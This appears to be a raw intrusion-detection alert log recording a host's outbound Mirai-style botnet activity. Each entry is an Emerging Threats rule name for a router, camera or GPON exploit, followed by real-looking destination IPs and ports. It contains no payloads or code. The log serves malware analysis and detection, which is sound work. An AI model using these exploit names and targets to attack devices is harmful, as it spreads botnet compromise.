                                                                  2024-11-28T07:28:09.611072+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348726191.33.92.1055555TCP
                                                                  2024-11-28T07:28:09.611404+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2339538111.150.127.17152869TCP
                                                                  2024-11-28T07:28:09.612885+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234965250.196.185.7280TCP
                                                                  2024-11-28T07:28:09.612885+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234965250.196.185.7280TCP
                                                                  2024-11-28T07:28:09.613986+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2337650119.37.208.25380TCP
                                                                  2024-11-28T07:28:09.614351+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2338900167.201.110.2088080TCP
                                                                  2024-11-28T07:28:09.614715+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355508184.76.229.897574TCP
                                                                  2024-11-28T07:28:09.615080+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23597822.144.168.15949152TCP
                                                                  2024-11-28T07:28:09.615448+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349878136.58.228.448080TCP
                                                                  2024-11-28T07:28:09.615817+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235849281.241.101.28080TCP
                                                                  2024-11-28T07:28:09.616177+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2358306102.6.12.1548080TCP
                                                                  2024-11-28T07:28:12.384471+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234992678.37.28.10580TCP
                                                                  2024-11-28T07:28:12.796431+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349106190.16.155.1075555TCP
                                                                  2024-11-28T07:28:12.796445+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345316187.38.102.20649152TCP
                                                                  2024-11-28T07:28:13.340343+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353954202.178.119.16180TCP
                                                                  2024-11-28T07:28:13.340343+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353954202.178.119.16180TCP
                                                                  2024-11-28T07:28:13.515361+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339418200.13.149.22380TCP
                                                                  2024-11-28T07:28:13.515361+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339418200.13.149.22380TCP
                                                                  2024-11-28T07:28:13.529270+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342400102.193.207.1468080TCP
                                                                  2024-11-28T07:28:15.212093+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353628210.236.235.5580TCP
                                                                  2024-11-28T07:28:20.742304+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233426230.84.48.13080TCP
                                                                  2024-11-28T07:28:20.773895+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235308868.228.150.778080TCP
                                                                  2024-11-28T07:28:20.773975+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234926255.92.215.8380TCP
                                                                  2024-11-28T07:28:20.774430+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2338934140.221.39.24280TCP
                                                                  2024-11-28T07:28:20.804549+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2343916105.45.143.15580TCP
                                                                  2024-11-28T07:28:20.929621+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.234522211.190.108.11780TCP
                                                                  2024-11-28T07:28:20.929627+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345012137.62.189.19380TCP
                                                                  2024-11-28T07:28:20.930524+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23490309.179.110.1118080TCP
                                                                  2024-11-28T07:28:20.931940+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336598152.206.32.1378080TCP
                                                                  2024-11-28T07:28:20.932029+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2353006180.158.189.19080TCP
                                                                  2024-11-28T07:28:20.932073+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23357649.31.4.1418080TCP
                                                                  2024-11-28T07:28:20.937493+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2351822120.121.182.1558080TCP
                                                                  2024-11-28T07:28:21.049788+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233417815.238.152.12780TCP
                                                                  2024-11-28T07:28:21.052153+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346204153.97.17.1958080TCP
                                                                  2024-11-28T07:28:21.052215+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235197628.36.92.24280TCP
                                                                  2024-11-28T07:28:21.169901+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2344862214.89.56.22980TCP
                                                                  2024-11-28T07:28:21.169914+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235262452.116.215.21080TCP
                                                                  2024-11-28T07:28:21.169914+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233408675.89.77.20680TCP
                                                                  2024-11-28T07:28:21.169953+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235849281.241.101.28080TCP
                                                                  2024-11-28T07:28:21.170264+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235702424.158.93.2358080TCP
                                                                  2024-11-28T07:28:21.170282+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2357430109.90.191.1758080TCP
                                                                  2024-11-28T07:28:21.170369+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2358462170.20.179.2318080TCP
                                                                  2024-11-28T07:28:21.170378+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235095058.130.138.13180TCP
                                                                  2024-11-28T07:28:21.170533+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.236060828.115.34.20780TCP
                                                                  2024-11-28T07:28:21.170616+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346996136.27.141.238080TCP
                                                                  2024-11-28T07:28:21.170774+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235446440.134.41.14780TCP
                                                                  2024-11-28T07:28:21.170823+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346042193.206.30.2108080TCP
                                                                  2024-11-28T07:28:21.170847+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345848131.57.28.1818080TCP
                                                                  2024-11-28T07:28:21.170877+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2345072209.161.87.328080TCP
                                                                  2024-11-28T07:28:21.170907+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2349042142.0.210.2538080TCP
                                                                  2024-11-28T07:28:21.170970+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2359610103.210.62.10380TCP
                                                                  2024-11-28T07:28:21.171006+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2346302187.46.100.11180TCP
                                                                  2024-11-28T07:28:21.171058+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2337136197.96.116.13580TCP
                                                                  2024-11-28T07:28:21.171084+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.23536189.27.194.1498080TCP
                                                                  2024-11-28T07:28:21.171192+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2354816167.138.9.25180TCP
                                                                  2024-11-28T07:28:21.171213+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.233741444.153.13.580TCP
                                                                  2024-11-28T07:28:21.171242+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.235021268.10.114.2480TCP
                                                                  2024-11-28T07:28:21.423506+01002027063ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561)1192.168.2.2336546217.237.6.18880TCP
                                                                  2024-11-28T07:28:21.505635+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353778141.244.188.1249152TCP
                                                                  2024-11-28T07:28:21.506352+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2341208149.132.110.24080TCP
                                                                  2024-11-28T07:28:21.507096+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235460495.159.40.2517574TCP
                                                                  2024-11-28T07:28:21.507480+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236084453.174.185.1805555TCP
                                                                  2024-11-28T07:28:21.507852+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2354262205.135.69.22080TCP
                                                                  2024-11-28T07:28:21.508250+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234944831.112.217.428080TCP
                                                                  2024-11-28T07:28:21.508943+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23423549.56.220.23149152TCP
                                                                  2024-11-28T07:28:21.509313+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340806110.44.0.1025555TCP
                                                                  2024-11-28T07:28:21.509692+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2349594155.174.193.2368080TCP
                                                                  2024-11-28T07:28:21.510050+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233514490.72.116.287574TCP
                                                                  2024-11-28T07:28:21.510419+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340192146.25.213.17449152TCP
                                                                  2024-11-28T07:28:21.510786+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344986191.45.226.738080TCP
                                                                  2024-11-28T07:28:21.511154+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354634155.64.195.257574TCP
                                                                  2024-11-28T07:28:21.511519+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339868209.78.212.218080TCP
                                                                  2024-11-28T07:28:21.511922+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235623286.252.168.1480TCP
                                                                  2024-11-28T07:28:21.511922+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235623286.252.168.1480TCP
                                                                  2024-11-28T07:28:21.512644+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.233510838.7.77.7152869TCP
                                                                  2024-11-28T07:28:21.513375+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2346152195.214.23.15652869TCP
                                                                  2024-11-28T07:28:21.513739+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336014133.133.78.16580TCP
                                                                  2024-11-28T07:28:21.513739+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336014133.133.78.16580TCP
                                                                  2024-11-28T07:28:21.514838+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352390201.188.175.2297574TCP
                                                                  2024-11-28T07:28:21.515221+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343430164.167.9.7080TCP
                                                                  2024-11-28T07:28:21.515221+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343430164.167.9.7080TCP
                                                                  2024-11-28T07:28:21.515574+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360010173.66.249.2307574TCP
                                                                  2024-11-28T07:28:21.516313+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341060105.175.75.1345555TCP
                                                                  2024-11-28T07:28:21.517057+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356158166.105.236.1827574TCP
                                                                  2024-11-28T07:28:21.517778+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233491825.125.5.5549152TCP
                                                                  2024-11-28T07:28:21.518872+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235515883.172.215.1185555TCP
                                                                  2024-11-28T07:28:21.519977+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235011680.12.206.2377574TCP
                                                                  2024-11-28T07:28:21.520340+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234048656.165.139.280TCP
                                                                  2024-11-28T07:28:21.520709+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23587262.243.56.19980TCP
                                                                  2024-11-28T07:28:21.520709+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23587262.243.56.19980TCP
                                                                  2024-11-28T07:28:21.521089+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2336932210.146.43.15980TCP
                                                                  2024-11-28T07:28:21.521442+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351316215.40.71.268080TCP
                                                                  2024-11-28T07:28:21.521811+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355336130.67.243.68080TCP
                                                                  2024-11-28T07:28:21.522182+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236037679.254.93.2649152TCP
                                                                  2024-11-28T07:28:21.523657+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2348998182.151.249.3880TCP
                                                                  2024-11-28T07:28:21.523657+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2348998182.151.249.3880TCP
                                                                  2024-11-28T07:28:21.524392+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233558047.234.28.1925555TCP
                                                                  2024-11-28T07:28:21.525866+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234429868.239.15.1618080TCP
                                                                  2024-11-28T07:28:21.527084+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233955284.5.28.1147574TCP
                                                                  2024-11-28T07:28:21.528098+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233991886.204.100.1858080TCP
                                                                  2024-11-28T07:28:21.528861+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2347010128.160.247.15149152TCP
                                                                  2024-11-28T07:28:21.529223+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358060148.76.110.16780TCP
                                                                  2024-11-28T07:28:21.529223+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358060148.76.110.16780TCP
                                                                  2024-11-28T07:28:21.529953+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357650156.166.198.1608080TCP
                                                                  2024-11-28T07:28:21.530325+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351176199.201.191.10049152TCP
                                                                  2024-11-28T07:28:21.530684+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236021687.41.98.9680TCP
                                                                  2024-11-28T07:28:21.530684+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236021687.41.98.9680TCP
                                                                  2024-11-28T07:28:21.531430+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2351858154.99.164.588080TCP
                                                                  2024-11-28T07:28:21.531786+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233558068.79.128.1227574TCP
                                                                  2024-11-28T07:28:21.532159+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2332862218.240.42.1078080TCP
                                                                  2024-11-28T07:28:21.532539+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235760653.189.162.14280TCP
                                                                  2024-11-28T07:28:21.532539+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235760653.189.162.14280TCP
                                                                  2024-11-28T07:28:21.533256+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336814100.12.64.16449152TCP
                                                                  2024-11-28T07:28:21.533621+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234314097.121.163.07574TCP
                                                                  2024-11-28T07:28:21.533982+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235759875.158.5.1398080TCP
                                                                  2024-11-28T07:28:21.534348+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233746614.55.151.4080TCP
                                                                  2024-11-28T07:28:21.534717+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234986656.59.236.15280TCP
                                                                  2024-11-28T07:28:21.535806+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235153418.236.8.1997574TCP
                                                                  2024-11-28T07:28:21.537258+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333380176.126.172.17480TCP
                                                                  2024-11-28T07:28:21.539500+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234176648.128.115.21349152TCP
                                                                  2024-11-28T07:28:21.540241+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235294441.90.240.2358080TCP
                                                                  2024-11-28T07:28:21.540611+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235271622.32.12.20180TCP
                                                                  2024-11-28T07:28:21.540611+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235271622.32.12.20180TCP
                                                                  2024-11-28T07:28:21.540971+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235516215.113.25.1317574TCP
                                                                  2024-11-28T07:28:21.541341+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2347578146.120.170.1838080TCP
                                                                  2024-11-28T07:28:21.541714+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2356390146.211.235.1158080TCP
                                                                  2024-11-28T07:28:21.542092+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234499477.47.103.2135555TCP
                                                                  2024-11-28T07:28:21.542511+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233966618.64.144.2548080TCP
                                                                  2024-11-28T07:28:21.542832+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233334871.241.194.21780TCP
                                                                  2024-11-28T07:28:21.542832+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233334871.241.194.21780TCP
                                                                  2024-11-28T07:28:21.543203+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234591499.57.40.1748080TCP
                                                                  2024-11-28T07:28:21.543947+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233760020.191.233.2480TCP
                                                                  2024-11-28T07:28:21.543947+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233760020.191.233.2480TCP
                                                                  2024-11-28T07:28:21.545424+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234154866.141.72.1967574TCP
                                                                  2024-11-28T07:28:21.545796+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235589819.97.225.2328080TCP
                                                                  2024-11-28T07:28:21.546184+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233487011.3.1.17980TCP
                                                                  2024-11-28T07:28:21.546184+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233487011.3.1.17980TCP
                                                                  2024-11-28T07:28:21.546541+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233695494.134.209.19680TCP
                                                                  2024-11-28T07:28:21.546541+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233695494.134.209.19680TCP
                                                                  2024-11-28T07:28:21.546935+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235120028.15.254.2180TCP
                                                                  2024-11-28T07:28:21.548056+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333322152.225.48.2365555TCP
                                                                  2024-11-28T07:28:21.548453+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235304816.34.243.12580TCP
                                                                  2024-11-28T07:28:21.548453+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235304816.34.243.12580TCP
                                                                  2024-11-28T07:28:21.548816+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234912463.216.152.23780TCP
                                                                  2024-11-28T07:28:21.549588+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233465014.206.36.6780TCP
                                                                  2024-11-28T07:28:21.549948+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341894121.122.226.15580TCP
                                                                  2024-11-28T07:28:21.549948+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341894121.122.226.15580TCP
                                                                  2024-11-28T07:28:21.550333+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354842109.73.44.11580TCP
                                                                  2024-11-28T07:28:21.550787+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346566110.53.18.205555TCP
                                                                  2024-11-28T07:28:21.551179+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.233573681.191.165.1908080TCP
                                                                  2024-11-28T07:28:21.551990+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235314094.210.13.657574TCP
                                                                  2024-11-28T07:28:21.552351+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2344560157.237.189.11952869TCP
                                                                  2024-11-28T07:28:21.553676+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353776196.163.229.2980TCP
                                                                  2024-11-28T07:28:21.553970+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2337510159.175.193.20752869TCP
                                                                  2024-11-28T07:28:21.554783+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343296221.219.229.13149152TCP
                                                                  2024-11-28T07:28:21.555548+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235253416.156.233.4780TCP
                                                                  2024-11-28T07:28:21.555548+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235253416.156.233.4780TCP
                                                                  2024-11-28T07:28:21.555919+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333188211.75.126.6949152TCP
                                                                  2024-11-28T07:28:21.556333+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.234939044.237.251.10552869TCP
                                                                  2024-11-28T07:28:21.557819+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.234612475.38.117.8780TCP
                                                                  2024-11-28T07:28:21.559686+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235627658.13.152.918080TCP
                                                                  2024-11-28T07:28:21.560080+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2353684123.224.87.23380TCP
                                                                  2024-11-28T07:28:21.560091+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235028847.171.207.6180TCP
                                                                  2024-11-28T07:28:21.560446+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235951864.105.173.628080TCP
                                                                  2024-11-28T07:28:21.560825+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334448108.32.60.1798080TCP
                                                                  2024-11-28T07:28:21.561240+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.235498474.232.116.9680TCP
                                                                  2024-11-28T07:28:21.561666+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236026279.141.55.10780TCP
                                                                  2024-11-28T07:28:21.561666+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236026279.141.55.10780TCP
                                                                  2024-11-28T07:28:21.562376+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336202151.33.64.107574TCP
                                                                  2024-11-28T07:28:21.563479+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353202123.87.2.23780TCP
                                                                  2024-11-28T07:28:21.563479+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353202123.87.2.23780TCP
                                                                  2024-11-28T07:28:21.563864+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.23512203.178.63.1338080TCP
                                                                  2024-11-28T07:28:21.564582+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2360674220.112.244.9352869TCP
                                                                  2024-11-28T07:28:21.564949+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350310119.24.183.338080TCP
                                                                  2024-11-28T07:28:21.565316+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355736164.49.37.15252869TCP
                                                                  2024-11-28T07:28:21.565680+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234574875.221.225.25049152TCP
                                                                  2024-11-28T07:28:21.566048+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235858665.22.127.937574TCP
                                                                  2024-11-28T07:28:21.566416+01002029215ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound1192.168.2.2352552122.78.77.2248080TCP
                                                                  2024-11-28T07:28:21.566775+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343462142.149.121.925555TCP
                                                                  2024-11-28T07:28:21.568650+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235071282.222.192.849152TCP
                                                                  2024-11-28T07:28:21.569014+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233698868.81.189.115555TCP
                                                                  2024-11-28T07:28:21.569387+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235415636.44.154.2307574TCP
                                                                  2024-11-28T07:28:21.569392+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.23507709.15.166.12952869TCP
                                                                  2024-11-28T07:28:21.569832+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353132175.176.33.3149152TCP
                                                                  2024-11-28T07:28:21.570123+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359062152.17.230.20780TCP
                                                                  2024-11-28T07:28:21.570498+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234904675.202.127.5849152TCP
                                                                  2024-11-28T07:28:21.570869+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233850858.88.196.1677574TCP
                                                                  2024-11-28T07:28:21.571632+01002027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound1192.168.2.2355040217.112.237.23852869TCP
                                                                  2024-11-28T07:28:21.571993+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235011863.93.5.5380TCP
